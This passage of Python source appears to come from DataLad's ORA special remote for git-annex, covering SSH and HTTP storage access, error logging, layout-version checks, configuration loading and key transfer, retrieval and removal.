in blocking mode, we can't easily fail on the\n # actual get (that is 'cat'). Therefore check beforehand.\n if not self.exists(archive):\n raise RIARemoteError(\"archive {arc} does not exist.\"\n \"\".format(arc=archive))\n\n # TODO: We probably need to check exitcode on stderr (via marker). If\n # archive or content is missing we will otherwise hang forever\n # waiting for stdout to fill `size`.\n\n cmd = '7z x -so {} {}\\n'.format(\n sh_quote(str(archive)),\n sh_quote(str(src)))\n self.shell.stdin.write(cmd.encode())\n self.shell.stdin.flush()\n\n # TODO: - size needs double-check and some robustness\n # - can we assume src to be a posixpath?\n # - RF: Apart from the executed command this should be pretty much\n # identical to self.get(), so move that code into a common\n # function\n\n from os.path import basename\n size = self._get_download_size_from_key(basename(str(src)))\n\n with open(dst, 'wb') as target_file:\n bytes_received = 0\n while bytes_received < size:\n c = self.shell.stdout.read1(self.buffer_size)\n if c:\n bytes_received += len(c)\n target_file.write(c)\n progress_cb(bytes_received)\n\n def read_file(self, file_path):\n\n cmd = \"cat {}\".format(sh_quote(str(file_path)))\n try:\n out = self._run(cmd, no_output=False, check=True)\n except RemoteCommandFailedError as e:\n # Currently we don't read stderr. 
All we know is, we couldn't read.\n # Try narrowing it down by calling a subsequent exists()\n if not self.exists(file_path):\n raise FileNotFoundError(f\"{str(file_path)} not found.\") from e\n else:\n raise RuntimeError(f\"Could not read {file_path}\") from e\n\n return out\n\n def write_file(self, file_path, content, mode='w'):\n\n if mode == 'w':\n mode = \">\"\n elif mode == 'a':\n mode = \">>\"\n else:\n raise ValueError(\"Unknown mode '{}'\".format(mode))\n if not content.endswith('\\n'):\n content += '\\n'\n\n cmd = \"printf '%s' {} {} {}\".format(\n sh_quote(content),\n mode,\n sh_quote(str(file_path)))\n try:\n self._run(cmd, check=True)\n except RemoteCommandFailedError as e:\n raise RIARemoteError(f\"Could not write to {file_path}\") from e\n\n def get_7z(self):\n # TODO: To not rely on availability in PATH we might want to use `which`\n # (`where` on windows) and get the actual path to 7z to re-use in\n # in_archive() and get().\n # Note: `command -v XXX` or `type` might be cross-platform\n # solution!\n # However, for availability probing only, it would be sufficient\n # to just call 7z and see whether it returns zero.\n\n try:\n self._run(\"7z\", check=True, no_output=False)\n return True\n except RemoteCommandFailedError:\n return False\n\n # try:\n # out = self._run(\"which 7z\", check=True, no_output=False)\n # return out\n # except RemoteCommandFailedError:\n # return None\n\n\nclass HTTPRemoteIO(object):\n # !!!!\n # This is not actually an IO class like SSHRemoteIO and LocalIO and needs\n # respective RF'ing of special remote implementation eventually.\n # We want ORA over HTTP, but with a server side CGI to talk to in order to\n # reduce the number of requests. Implementing this as such an IO class would\n # mean to have separate requests for all server side executions, which is\n # what we do not want. As a consequence ORARemote class implementation needs\n # to treat HTTP as a special case until refactoring to a design that fits\n # both approaches.\n\n # NOTE: For now read-only. 
Not sure yet whether an IO class is the right\n # approach.\n\n def __init__(self, url, buffer_size=DEFAULT_BUFFER_SIZE):\n from datalad.downloaders.providers import Providers\n if not url.startswith(\"http\"):\n raise RIARemoteError(\"Expected HTTP URL, but got {}\".format(url))\n\n self.store_url = url.rstrip('/')\n\n # make sure default is used when None was passed, too.\n self.buffer_size = buffer_size if buffer_size else DEFAULT_BUFFER_SIZE\n self._providers = Providers.from_config_files()\n\n def checkpresent(self, key_path):\n # Note, that we need the path with hash dirs, since we don't have access\n # to annexremote.dirhash from within IO classes\n\n return self.exists(key_path)\n\n def get(self, key_path, filename, progress_cb):\n # Note, that we need the path with hash dirs, since we don't have access\n # to annexremote.dirhash from within IO classes\n\n url = self.store_url + str(key_path)\n self._providers.download(url, path=filename, overwrite=True)\n\n def exists(self, path):\n # use same signature as in SSH and Local IO, although validity is\n # limited in case of HTTP.\n url = self.store_url + path.as_posix()\n try:\n response = requests.head(url, allow_redirects=True)\n except Exception as e:\n raise RIARemoteError from e\n\n return response.status_code == 200\n\n def read_file(self, file_path):\n\n from datalad.support.network import download_url\n url = self.store_url + file_path.as_posix()\n try:\n content = download_url(url)\n\n # NOTE re Exception handling:\n # We reraise here to:\n # 1. Unify exceptions across IO classes\n # 2. Get cleaner user messages. ATM what we get from the\n # Downloaders are exceptions, that have their cause-chain baked\n # into their string rather than being e proper exception chain.\n # Hence, we can't generically extract the ultimate cause.\n # RemoteError will eventually pass the entire chain string to\n # annex. If we add our own exception here on top, this is what is\n # displayed first to the user, rather than being buried deep into\n # a hard to parse message.\n except AccessDeniedError as exc:\n raise PermissionError(f\"Permission denied: '{url}'\") from exc\n\n except DownloadError as exc:\n # Note: This comes from the downloader. `check_response_status`\n # in downloaders/http.py does not currently use\n # `raise_from_status`, hence we don't get a proper HTTPError to\n # check for a 404 and thereby distinguish from connection issues.\n # When this is addressed in the downloader code, we need to\n # adjust here.\n if \"not found\" in str(exc):\n # Raise uniform exception across IO classes:\n raise FileNotFoundError(f\"{url} not found.\") from exc\n else:\n # Note: There's AccessFailedError(DownloadError) as well.\n # However, we can't really tell them meaningfully apart,\n # since possible underlying HTTPErrors, etc. are baked into\n # their strings. Hence, \"Failed to access\" is what we can\n # tell here in either case.\n raise RuntimeError(f\"Failed to access {url}\") from exc\n return content\n\n\ndef handle_errors(func):\n \"\"\"Decorator to convert and log errors\n\n Intended to use with every method of RiaRemote class, facing the outside\n world. 
In particular, that is about everything, that may be called via\n annex' special remote protocol, since a non-RemoteError will simply result\n in a broken pipe by default handling.\n \"\"\"\n\n # TODO: configurable on remote end (flag within layout_version!)\n\n @wraps(func)\n def _wrap_handle_errors(self, *args, **kwargs):\n try:\n return func(self, *args, **kwargs)\n except Exception as e:\n if self.remote_log_enabled:\n try:\n from datetime import datetime\n from traceback import format_exc\n exc_str = format_exc()\n entry = \"{time}: Error:\\n{exc_str}\\n\" \\\n \"\".format(time=datetime.now(),\n exc_str=exc_str)\n # ensure base path is platform path\n log_target = (\n url_path2local_path(self.store_base_path)\n / \"error_logs\"\n / \"{dsid}.{uuid}.log\".format(\n dsid=self.archive_id,\n uuid=self._repo.uuid))\n self.io.write_file(log_target, entry, mode='a')\n except Exception:\n # If logging of the exception does fail itself, there's\n # nothing we can do about it. Hence, don't log and report\n # the original issue only.\n # TODO: With a logger that doesn't sabotage the\n # communication with git-annex, we should be abe to use\n # CapturedException here, in order to get an informative\n # traceback in a debug message.\n pass\n\n try:\n # We're done using io, so let it perform any needed cleanup. At\n # the moment, this is only relevant for SSHRemoteIO, in which\n # case it cleans up the SSH socket and prevents a hang with\n # git-annex 8.20201103 and later.\n from atexit import unregister\n if self._io:\n self._io.close()\n unregister(self._io.close)\n if self._push_io:\n self._push_io.close()\n unregister(self._push_io.close)\n except AttributeError:\n # seems like things are already being cleaned up -> a good\n pass\n except Exception:\n # anything else: Not a problem. We are about to exit anyway\n pass\n\n if not isinstance(e, RIARemoteError):\n raise RIARemoteError from e\n else:\n raise e\n\n return _wrap_handle_errors\n\n\nclass NoLayoutVersion(Exception):\n pass\n\n\nclass ORARemote(SpecialRemote):\n \"\"\"This is the class of RIA remotes.\n \"\"\"\n\n dataset_tree_version = '1'\n object_tree_version = '2'\n # TODO: Move known versions. Needed by creation routines as well.\n known_versions_objt = ['1', '2']\n known_versions_dst = ['1']\n\n @handle_errors\n def __init__(self, annex):\n super(ORARemote, self).__init__(annex)\n if hasattr(self, 'configs'):\n # introduced in annexremote 1.4.2 to support LISTCONFIGS\n self.configs['url'] = \"RIA store to use\"\n self.configs['push-url'] = \"URL for pushing to the RIA store. \" \\\n \"Optional.\"\n self.configs['archive-id'] = \"Dataset ID (fallback: annex uuid. 
\" \\\n \"Should be set automatically by \" \\\n \"datalad\"\n # the local repo\n self._repo = None\n self.gitdir = None\n self.name = None # name of the special remote\n self.gitcfg_name = None # name in respective git remote\n\n self.ria_store_url = None\n self.ria_store_pushurl = None\n # machine to SSH-log-in to access/store the data\n # subclass must set this\n self.storage_host = None\n self.storage_host_push = None\n # must be absolute, and POSIX (will be instance of PurePosixPath)\n # subclass must set this\n self.store_base_path = None\n self.store_base_path_push = None\n # by default we can read and write\n self.read_only = False\n self.force_write = None\n self.ignore_remote_config = None\n self.remote_log_enabled = None\n self.remote_dataset_tree_version = None\n self.remote_object_tree_version = None\n\n # for caching the remote's layout locations:\n self.remote_git_dir = None\n self.remote_archive_dir = None\n self.remote_obj_dir = None\n # lazy IO:\n self._io = None\n self._push_io = None\n\n # cache obj_locations:\n self._last_archive_path = None\n self._last_keypath = (None, None)\n\n # SSH \"streaming\" buffer\n self.buffer_size = DEFAULT_BUFFER_SIZE\n\n def verify_store(self):\n \"\"\"Check whether the store exists and reports a layout version we\n know\n\n The layout of the store is recorded in base_path/ria-layout-version.\n If the version found on the remote end isn't supported and `force-write`\n isn't configured, sets the remote to read-only operation.\n \"\"\"\n\n # ensure base path is platform path\n dataset_tree_version_file = \\\n url_path2local_path(self.store_base_path) / 'ria-layout-version'\n\n # check dataset tree version\n try:\n self.remote_dataset_tree_version = \\\n self._get_version_config(dataset_tree_version_file)\n except Exception as exc:\n raise RIARemoteError(\"RIA store unavailable.\") from exc\n if self.remote_dataset_tree_version not in self.known_versions_dst:\n # Note: In later versions, condition might change in order to\n # deal with older versions.\n raise UnknownLayoutVersion(f\"RIA store layout version unknown: \"\n f\"{self.remote_dataset_tree_version}\")\n\n def verify_ds_in_store(self):\n \"\"\"Check whether the dataset exists in store and reports a layout\n version we know\n\n The layout is recorded in\n 'dataset_somewhere_beneath_base_path/ria-layout-version.'\n If the version found on the remote end isn't supported and `force-write`\n isn't configured, sets the remote to read-only operation.\n \"\"\"\n\n object_tree_version_file = self.remote_git_dir / 'ria-layout-version'\n\n # check (annex) object tree version\n try:\n self.remote_object_tree_version =\\\n self._get_version_config(object_tree_version_file)\n except Exception as e:\n raise RIARemoteError(\"Dataset unavailable from RIA store.\")\n if self.remote_object_tree_version not in self.known_versions_objt:\n raise UnknownLayoutVersion(f\"RIA dataset layout version unknown: \"\n f\"{self.remote_object_tree_version}\")\n\n def _load_local_cfg(self):\n\n # this will work, even when this is not a bare repo\n # but it is not capable of reading out dataset/branch config\n self._repo = AnnexRepo(self.gitdir)\n\n cfg_map = {\"ora-force-write\": \"force_write\",\n \"ora-ignore-ria-config\": \"ignore_remote_config\",\n \"ora-buffer-size\": \"buffer_size\",\n \"ora-url\": \"ria_store_url\",\n \"ora-push-url\": \"ria_store_pushurl\"\n }\n\n # in initremote we may not have a reliable name of the git remote config\n # yet. 
Go with the default.\n gitcfg_name = self.gitcfg_name or self.name\n if gitcfg_name:\n for cfg, att in cfg_map.items():\n value = self._repo.config.get(f\"remote.{gitcfg_name}.{cfg}\")\n if value is not None:\n self.__setattr__(cfg_map[cfg], value)\n if cfg == \"ora-url\":\n self.ria_store_url_source = 'local'\n elif cfg == \"ora-push-url\":\n self.ria_store_pushurl_source = 'local'\n if self.buffer_size:\n try:\n self.buffer_size = int(self.buffer_size)\n except ValueError:\n self.message(f\"Invalid value of config \"\n f\"'remote.{gitcfg_name}.\"\n f\"ora-buffer-size': {self.buffer_size}\")\n self.buffer_size = DEFAULT_BUFFER_SIZE\n\n if self.name:\n # Consider deprecated configs if there's no value yet\n if self.force_write is None:\n self.force_write = self._repo.config.get(\n f'annex.ora-remote.{self.name}.force-write')\n if self.force_write:\n self.message(\"WARNING: config \"\n \"'annex.ora-remote.{}.force-write' is \"\n \"deprecated. Use 'remote.{}.ora-force-write' \"\n \"instead.\".format(self.name, self.gitcfg_name))\n try:\n self.force_write = anything2bool(self.force_write)\n except TypeError:\n raise RIARemoteError(\"Invalid value of config \"\n \"'annex.ora-remote.{}.force-write'\"\n \": {}\".format(self.name,\n self.force_write))\n\n if self.ignore_remote_config is None:\n self.ignore_remote_config = self._repo.config.get(\n f\"annex.ora-remote.{self.name}.ignore-remote-config\")\n if self.ignore_remote_config:\n self.message(\"WARNING: config \"\n \"'annex.ora-remote.{}.ignore-remote-config' is\"\n \" deprecated. Use \"\n \"'remote.{}.ora-ignore-ria-config' instead.\"\n \"\".format(self.name, self.gitcfg_name))\n try:\n self.ignore_remote_config = \\\n anything2bool(self.ignore_remote_config)\n except TypeError:\n raise RIARemoteError(\n \"Invalid value of config \"\n \"'annex.ora-remote.{}.ignore-remote-config': {}\"\n \"\".format(self.name, self.ignore_remote_config))\n\n def _load_committed_cfg(self, fail_noid=True):\n\n # which repo are we talking about\n self.gitdir = self.annex.getgitdir()\n\n # go look for an ID\n self.archive_id = self.annex.getconfig('archive-id')\n if fail_noid and not self.archive_id:\n # TODO: Message! \"archive ID\" is confusing. dl-id or annex-uuid\n raise RIARemoteError(\n \"No archive ID configured. This should not happen.\")\n\n # what is our uuid?\n self.uuid = self.annex.getuuid()\n\n # RIA store URL(s)\n self.ria_store_url = self.annex.getconfig('url')\n if self.ria_store_url:\n self.ria_store_url_source = 'annex'\n self.ria_store_pushurl = self.annex.getconfig('push-url')\n if self.ria_store_pushurl:\n self.ria_store_pushurl_source = 'annex'\n\n # TODO: This should prob. not be done! Would only have an effect if\n # force-write was committed annex-special-remote-config and this\n # is likely a bad idea.\n self.force_write = self.annex.getconfig('force-write')\n if self.force_write == \"\":\n self.force_write = None\n\n # Get the special remote name\n # TODO: Make 'name' a property of `SpecialRemote`;\n # Same for `gitcfg_name`, `_repo`?\n self.name = self.annex.getconfig('name')\n if not self.name:\n self.name = self.annex.getconfig('sameas-name')\n if not self.name:\n # TODO: Do we need to crash? Not necessarily, I think. 
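        # A minimal illustration (hedged addition, not from the upstream
        # module): the per-remote "ora-*" keys consulted by _load_local_cfg
        # above are ordinary git config entries, so a local override of the
        # committed store location could look like this (remote name, host
        # and path are hypothetical):
        #
        #   git config remote.ora-storage.ora-url ria+ssh://store.example.org/data/ria
        #   git config remote.ora-storage.ora-buffer-size 65536
        #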
We could\n # still find configs and if not - might work out.\n raise RIARemoteError(\n \"Cannot determine special remote name, got: {}\".format(\n repr(self.name)))\n # Get the name of the remote entry in .git/config.\n # Note, that this by default is the same as the stored name of the\n # special remote, but can be different (for example after\n # git-remote-rename). The actual connection is the uuid of the special\n # remote, not the name.\n try:\n self.gitcfg_name = self.annex.getgitremotename()\n except (ProtocolError, AttributeError):\n # GETGITREMOTENAME not supported by annex version or by annexremote\n # version.\n # Lets try to find ourselves: Find remote with matching annex uuid\n response = _get_gitcfg(self.gitdir,\n r\"^remote\\..*\\.annex-uuid\",\n regex=True)\n response = response.splitlines() if response else []\n candidates = set()\n for line in response:\n k, v = line.split()\n if v == self.annex.getuuid(): # TODO: Where else? self.uuid?\n candidates.add(''.join(k.split('.')[1:-1]))\n num_candidates = len(candidates)\n if num_candidates == 1:\n self.gitcfg_name = candidates.pop()\n elif num_candidates > 1:\n self.message(\"Found multiple used remote names in git \"\n \"config: %s\" % str(candidates))\n # try same name:\n if self.name in candidates:\n self.gitcfg_name = self.name\n self.message(\"Choose '%s'\" % self.name)\n else:\n self.gitcfg_name = None\n self.message(\"Ignore git config\")\n else:\n # No entry found.\n # Possible if we are in \"initremote\".\n self.gitcfg_name = None\n\n def _load_cfg(self, gitdir, name):\n # Whether or not to force writing to the remote. Currently used to\n # overrule write protection due to layout version mismatch.\n self.force_write = self._repo.config.get(\n f'annex.ora-remote.{name}.force-write')\n\n # whether to ignore config flags set at the remote end\n self.ignore_remote_config = \\\n self._repo.config.get(\n f'annex.ora-remote.{name}.ignore-remote-config')\n\n # buffer size for reading files over HTTP and SSH\n self.buffer_size = self._repo.config.get(\n f\"remote.{name}.ora-buffer-size\")\n\n if self.buffer_size:\n self.buffer_size = int(self.buffer_size)\n\n def _verify_config(self, fail_noid=True):\n # try loading all needed info from (git) config\n\n # first load committed config\n self._load_committed_cfg(fail_noid=fail_noid)\n # now local configs (possible overwrite of committed)\n self._load_local_cfg()\n\n # get URL rewriting config\n url_cfgs = {k: v for k, v in self._repo.config.items()\n if k.startswith('url.')}\n\n if self.ria_store_url:\n self.storage_host, self.store_base_path, self.ria_store_url = \\\n verify_ria_url(self.ria_store_url, url_cfgs)\n\n else:\n # There's one exception to the precedence of local configs:\n # Age-old \"ssh-host\" + \"base-path\" configs are only considered,\n # if there was no RIA URL (local or committed). However, issue\n # deprecation warning, if that situation is encountered:\n host = None\n path = None\n\n if self.name:\n host = self._repo.config.get(\n f'annex.ora-remote.{self.name}.ssh-host') or \\\n self.annex.getconfig('ssh-host')\n # Note: Special value '0' is replaced by None only after checking\n # the repository's annex config. 
This is to uniformly handle '0' and\n # None later on, but let a user's config '0' overrule what's\n # stored by git-annex.\n self.storage_host = None if host == '0' else host\n path = self._repo.config.get(\n f'annex.ora-remote.{self.name}.base-path') or \\\n self.annex.getconfig('base-path')\n self.store_base_path = path.strip() if path else path\n\n if path or host:\n self.message(\"WARNING: base-path + ssh-host configs are \"\n \"deprecated and won't be considered in the future.\"\n \" Use 'git annex enableremote {} \"\n \"url=<RIA-URL-TO-STORE>' to store a ria+<scheme>:\"\n \"//... URL in the special remote's config.\"\n \"\".format(self.name),\n type='info')\n\n\n if not self.store_base_path:\n raise RIARemoteError(\n \"No base path configured for RIA store. Specify a proper \"\n \"ria+<scheme>://... URL.\")\n\n # the base path is ultimately derived from a URL, always treat as POSIX\n self.store_base_path = PurePosixPath(self.store_base_path)\n if not self.store_base_path.is_absolute():\n raise RIARemoteError(\n 'Non-absolute RIA store base path configuration: %s'\n '' % str(self.store_base_path))\n\n if self.ria_store_pushurl:\n if self.ria_store_pushurl.startswith(\"ria+http\"):\n raise RIARemoteError(\"Invalid push-url: {}. Pushing over HTTP \"\n \"not implemented.\"\n \"\".format(self.ria_store_pushurl))\n self.storage_host_push, \\\n self.store_base_path_push, \\\n self.ria_store_pushurl = \\\n verify_ria_url(self.ria_store_pushurl, url_cfgs)\n self.store_base_path_push = PurePosixPath(self.store_base_path_push)\n\n def _get_version_config(self, path):\n \"\"\" Get version and config flags from RIA store's layout file\n \"\"\"\n\n if self.ria_store_url:\n # construct path to ria_layout_version file for reporting\n local_store_base_path = url_path2local_path(self.store_base_path)\n target_ri = (\n self.ria_store_url[4:]\n + \"/\"\n + path.relative_to(local_store_base_path).as_posix()\n )\n elif self.storage_host:\n target_ri = \"ssh://{}{}\".format(self.storage_host, path.as_posix())\n else:\n target_ri = path.as_uri()\n\n try:\n file_content = self.io.read_file(path).strip().split('|')\n\n # Note, that we enhance the reporting here, as the IO classes don't\n # uniformly operate on that kind of RI (which is more informative\n # as it includes the store base address including the access\n # method).\n except FileNotFoundError as exc:\n raise NoLayoutVersion(\n f\"{target_ri} not found, \"\n f\"self.ria_store_url: {self.ria_store_url}, \"\n f\"self.store_base_pass: {self.store_base_path}, \"\n f\"self.store_base_pass_push: {self.store_base_path_push}, \"\n f\"path: {type(path)} {path}\") from exc\n except PermissionError as exc:\n raise PermissionError(f\"Permission denied: {target_ri}\") from exc\n except Exception as exc:\n raise RuntimeError(f\"Failed to access {target_ri}\") from exc\n\n if not (1 <= len(file_content) <= 2):\n self.message(\"invalid version file {}\".format(path),\n type='info')\n return None\n\n remote_version = file_content[0]\n remote_config_flags = file_content[1] \\\n if len(file_content) == 2 else None\n if not self.ignore_remote_config and remote_config_flags:\n # Note: 'or', since config flags can come from toplevel\n # (dataset-tree-root) as well as from dataset-level.\n # toplevel is supposed flag the entire tree.\n self.remote_log_enabled = self.remote_log_enabled or \\\n 'l' in remote_config_flags\n\n return remote_version\n\n def get_store(self):\n \"\"\"checks the remote end for an existing store and dataset\n\n Furthermore reads and stores 
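        # A minimal illustration (hedged addition, not from the upstream
        # module): the 'ria-layout-version' file read by _get_version_config
        # above holds a version string, optionally followed by '|' and config
        # flags. A store-root file containing "1|l" reports dataset-tree
        # version 1 with remote error-logging ('l') enabled. Sketch of the
        # parsing performed above:
        #
        #   content = "1|l".strip().split('|')
        #   version, flags = content[0], (content[1] if len(content) == 2 else None)
        #   # version == "1", flags == "l"
        #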
version and config flags, layout\n locations, etc.\n If this doesn't raise, the remote end should be fine to work with.\n \"\"\"\n # make sure the base path is a platform path when doing local IO\n # the incoming Path object is a PurePosixPath\n # XXX this else branch is wrong: Incoming is PurePosixPath\n # but it is subsequently assumed to be a platform path, by\n # get_layout_locations() etc. Hence it must be converted\n # to match the *remote* platform, not the local client\n store_base_path = (\n url_path2local_path(self.store_base_path)\n if self._local_io\n else self.store_base_path)\n\n # cache remote layout directories\n self.remote_git_dir, self.remote_archive_dir, self.remote_obj_dir = \\\n self.get_layout_locations(store_base_path, self.archive_id)\n\n read_only_msg = \"Treating remote as read-only in order to \" \\\n \"prevent damage by putting things into an unknown \" \\\n \"version of the target layout. You can overrule this \" \\\n \"by setting 'annex.ora-remote.<name>.force-write=true'.\"\n try:\n self.verify_store()\n except UnknownLayoutVersion:\n reason = \"Remote dataset tree reports version {}. Supported \" \\\n \"versions are: {}. Consider upgrading datalad or \" \\\n \"fix the 'ria-layout-version' file at the RIA store's \" \\\n \"root. \".format(self.remote_dataset_tree_version,\n self.known_versions_dst)\n self._set_read_only(reason + read_only_msg)\n except NoLayoutVersion:\n reason = \"Remote doesn't report any dataset tree version. \" \\\n \"Consider upgrading datalad or add a fitting \" \\\n \"'ria-layout-version' file at the RIA store's \" \\\n \"root.\"\n self._set_read_only(reason + read_only_msg)\n\n try:\n self.verify_ds_in_store()\n except UnknownLayoutVersion:\n reason = \"Remote object tree reports version {}. Supported\" \\\n \"versions are {}. Consider upgrading datalad or \" \\\n \"fix the 'ria-layout-version' file at the remote \" \\\n \"dataset root. \" \\\n \"\".format(self.remote_object_tree_version,\n self.known_versions_objt)\n self._set_read_only(reason + read_only_msg)\n except NoLayoutVersion:\n reason = \"Remote doesn't report any object tree version. \" \\\n \"Consider upgrading datalad or add a fitting \" \\\n \"'ria-layout-version' file at the remote \" \\\n \"dataset root. \"\n self._set_read_only(reason + read_only_msg)\n\n @handle_errors\n def initremote(self):\n self._verify_config(fail_noid=False)\n if not self.archive_id:\n self.archive_id = _get_datalad_id(self.gitdir)\n if not self.archive_id:\n # fall back on the UUID for the annex remote\n self.archive_id = self.annex.getuuid()\n\n self.get_store()\n\n self.annex.setconfig('archive-id', self.archive_id)\n # Make sure, we store the potentially rewritten URL. But only, if the\n # source was annex as opposed to a local config.\n if self.ria_store_url and self.ria_store_url_source == 'annex':\n self.annex.setconfig('url', self.ria_store_url)\n if self.ria_store_pushurl and self.ria_store_pushurl_source == 'annex':\n self.annex.setconfig('push-url', self.ria_store_pushurl)\n\n def _local_io(self):\n \"\"\"Are we doing local operations?\"\"\"\n # let's not make this decision dependent on the existence\n # of a directory the matches the name of the configured\n # store tree base dir. Such a match could be pure\n # coincidence. 
Instead, let's do remote whenever there\n # is a remote host configured\n #return self.store_base_path.is_dir()\n\n # TODO: Isn't that wrong with HTTP anyway?\n # + just isinstance(LocalIO)?\n # XXX isinstance(LocalIO) would not work, this method is used\n # before LocalIO is instantiated\n return not self.storage_host\n\n def _set_read_only(self, msg):\n\n if not self.force_write:\n self.read_only = True\n self.message(msg, type='info')\n else:\n self.message(\"Was instructed to force write\", type='info')\n\n def _ensure_writeable(self):\n if self.read_only:\n raise RIARemoteError(\"Remote is treated as read-only. \"\n \"Set 'ora-remote.<name>.force-write=true' to \"\n \"overrule this.\")\n if isinstance(self.push_io, HTTPRemoteIO):\n raise RIARemoteError(\"Write access via HTTP not implemented\")\n\n @property\n def io(self):\n if not self._io:\n if self._local_io():\n self._io = LocalIO()\n elif self.ria_store_url.startswith(\"ria+http\"):\n # TODO: That construction of \"http(s)://host/\" should probably\n # be moved, so that we get that when we determine\n # self.storage_host. In other words: Get the parsed URL\n # instead and let HTTPRemoteIO + SSHRemoteIO deal with it\n # uniformly. Also: Don't forget about a possible port.\n\n url_parts = self.ria_store_url[4:].split('/')\n # we expect parts: (\"http(s):\", \"\", host:port, path)\n self._io = HTTPRemoteIO(\n url_parts[0] + \"//\" + url_parts[2],\n self.buffer_size\n )\n elif self.storage_host:\n self._io = SSHRemoteIO(self.storage_host, self.buffer_size)\n from atexit import register\n register(self._io.close)\n else:\n raise RIARemoteError(\n \"Local object tree base path does not exist, and no SSH\"\n \"host configuration found.\")\n return self._io\n\n @property\n def push_io(self):\n # Instance of an IOBase subclass for execution based on configured\n # 'push-url' if such exists. Otherwise identical to `self.io`.\n # Note, that once we discover we need to use the push-url (that is on\n # TRANSFER_STORE and REMOVE), we should switch all operations to that IO\n # instance instead of using different connections for read and write\n # operations. Ultimately this is due to the design of annex' special\n # remote protocol - we don't know which annex command is running and\n # therefore we don't know whether to use fetch or push URL during\n # PREPARE.\n\n if not self._push_io:\n if self.ria_store_pushurl:\n self.message(\"switching ORA to push-url\")\n # Not-implemented-push-HTTP is ruled out already when reading\n # push-url, so either local or SSH:\n if not self.storage_host_push:\n # local operation\n self._push_io = LocalIO()\n else:\n self._push_io = SSHRemoteIO(self.storage_host_push,\n self.buffer_size)\n\n # We have a new instance. 
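                # A minimal illustration (hedged addition, not from the
                # upstream module): a separate write endpoint is supplied via
                # the special remote's 'push-url' parameter, or the local
                # 'remote.<name>.ora-push-url' git config, e.g. with a
                # hypothetical remote name and host:
                #
                #   git annex enableremote ora-storage push-url=ria+ssh://io.example.org/data/ria
                #
                # As checked in _verify_config above, only SSH or local
                # push-urls are accepted; pushing over HTTP is not implemented.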
Kill the existing one and replace.\n from atexit import register, unregister\n if hasattr(self.io, 'close'):\n unregister(self.io.close)\n self.io.close()\n\n # XXX now also READ IO is done with the write IO\n # this explicitly ignores the remote config\n # that distinguishes READ from WRITE with different\n # methods\n self._io = self._push_io\n if hasattr(self.io, 'close'):\n register(self.io.close)\n\n self.storage_host = self.storage_host_push\n self.store_base_path = self.store_base_path_push\n\n # delete/update cached locations:\n self._last_archive_path = None\n self._last_keypath = (None, None)\n\n store_base_path = (\n url_path2local_path(self.store_base_path)\n if self._local_io\n else self.store_base_path)\n\n self.remote_git_dir, \\\n self.remote_archive_dir, \\\n self.remote_obj_dir = \\\n self.get_layout_locations(store_base_path, self.archive_id)\n\n else:\n # no push-url: use existing IO\n self._push_io = self._io\n\n return self._push_io\n\n @handle_errors\n def prepare(self):\n\n gitdir = self.annex.getgitdir()\n self._repo = AnnexRepo(gitdir)\n self._verify_config()\n\n self.get_store()\n\n # report active special remote configuration/status\n self.info = {\n 'store_base_path': str(self.store_base_path),\n 'storage_host': 'local'\n if self._local_io() else self.storage_host,\n }\n\n # TODO: following prob. needs hasattr instead:\n if not isinstance(self.io, HTTPRemoteIO):\n self.info['7z'] = (\"not \" if not self.io.get_7z() else \"\") + \\\n \"available\"\n\n @handle_errors\n def transfer_store(self, key, filename):\n self._ensure_writeable()\n\n # we need a file-system compatible name for the key\n key = _sanitize_key(key)\n\n dsobj_dir, archive_path, key_path = self._get_obj_location(key)\n key_path = dsobj_dir / key_path\n\n if self.push_io.exists(key_path):\n # if the key is here, we trust that the content is in sync\n # with the key\n return\n\n self.push_io.mkdir(key_path.parent)\n\n # We need to copy to a temp location to let checkpresent fail while the\n # transfer is still in progress and furthermore not interfere with\n # administrative tasks in annex/objects.\n # In addition include uuid, to not interfere with parallel uploads from\n # different clones.\n transfer_dir = \\\n self.remote_git_dir / \"ora-remote-{}\".format(self._repo.uuid) / \"transfer\"\n self.push_io.mkdir(transfer_dir)\n tmp_path = transfer_dir / key\n\n try:\n self.push_io.put(filename, tmp_path, self.annex.progress)\n # copy done, atomic rename to actual target\n self.push_io.rename(tmp_path, key_path)\n except Exception as e:\n # whatever went wrong, we don't want to leave the transfer location\n # blocked\n self.push_io.remove(tmp_path)\n raise e\n\n @handle_errors\n def transfer_retrieve(self, key, filename):\n # we need a file-system compatible name for the key\n key = _sanitize_key(key)\n\n dsobj_dir, archive_path, key_path = self._get_obj_location(key)\n abs_key_path = dsobj_dir / key_path\n # sadly we have no idea what type of source gave checkpresent->true\n # we can either repeat the checks, or just make two opportunistic\n # attempts (at most)\n try:\n self.io.get(abs_key_path, filename, self.annex.progress)\n except Exception as e1:\n if isinstance(self.io, HTTPRemoteIO):\n # no client-side archive access over HTTP\n # Note: This is intentional, as it would mean one additional\n # request per key. 
However, server response to the GET can\n # consider archives on their end.\n raise\n # catch anything and keep it around for a potential re-raise\n try:\n self.io.get_from_archive(archive_path, key_path, filename,\n self.annex.progress)\n except Exception as e2:\n # TODO properly report the causes\n raise RIARemoteError('Failed to obtain key: {}'\n ''.format([str(e1), str(e2)]))\n\n @handle_errors\n def checkpresent(self, key):\n # we need a file-system compatible name for the key\n key = _sanitize_key(key)\n\n dsobj_dir, archive_path, key_path = self._get_obj_location(key)\n abs_key_path = dsobj_dir / key_path\n if self.io.exists(abs_key_path):\n # we have an actual file for this key\n return True\n if isinstance(self.io, HTTPRemoteIO):\n # no client-side archive access over HTTP\n return False\n # do not make a careful check whether an archive exists, because at\n # present this requires an additional SSH call for remote operations\n # which may be rather slow. Instead just try to run 7z on it and let\n # it fail if no archive is around\n # TODO honor future 'archive-mode' flag\n return self.io.in_archive(archive_path, key_path)\n\n @handle_errors\n def remove(self, key):\n # we need a file-system compatible name for the key\n key = _sanitize_key(key)\n\n self._ensure_writeable()\n\n dsobj_dir, archive_path, key_path = self._get_obj_location(key)\n key_path = dsobj_dir / key_path\n if self.push_io.exists(key_path):\n self.push_io.remove(key_path)\n key_dir = key_path\n # remove at most two levels of empty directories\n for level in range(2):\n key_dir = key_dir.parent\n try:\n self.push_io.remove_dir(key_dir)\n except Exception:\n break\n\n @handle_errors\n def getcost(self):\n # 100 is cheap, 200 is expensive (all relative to Config/Cost.hs)\n # 100/200 are the defaults for local and remote operations in\n # git-annex\n # if we have the object tree locally, operations are cheap (100)\n # otherwise expensive (200)\n return '100' if self._local_io() else '200'\n\n @handle_errors\n def whereis(self, key):\n # we need a file-system compatible name for the key\n key = _sanitize_key(key)\n\n dsobj_dir, archive_path, key_path = self._get_obj_location(key)\n if isinstance(self.io, HTTPRemoteIO):\n # display the 